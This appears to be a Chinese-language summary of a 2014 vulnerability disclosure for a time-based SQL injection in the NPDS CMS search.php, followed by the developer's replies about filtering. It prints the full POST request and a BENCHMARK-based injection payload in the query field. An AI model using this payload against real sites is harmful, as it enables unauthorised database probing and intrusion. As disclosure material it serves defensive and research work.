关键信息 漏洞类型 Time-Based SQL Injection 报告人信息 Narendra Bhati Email: bhati.contact@gmail.com 职位: Security Analyst @ Suma Soft Pvt. Ltd 漏洞细节 报告日期: 14/11/2014 时间: 19:10 请求类型: POST /npds/search.php HTTP/1.1 请求头 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://127.0.0.1/npds/index.php?op=edito Cookie: admin=; etc. Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 63 请求体 query=asdads%3Cxss%3E%20benchmark(20000000%2Csha1(1))--%20 开发者回应 15/11/2014 09:58 - 会尽快考虑并处理 - 联系: developpeur@_npds.org 16/11/2014 17:12 - 验证SQL请求是否能执行 指令(耗时操作),以确定是否存在SQL注入 - 感谢Narendra Bhati的安全分析 - 所有SQL请求已通过url_protect过滤,检查是否足够安全 后续分析 search.php文件的过滤功能正常 将增加对 指令的过滤 感谢Narendra Bhati的工作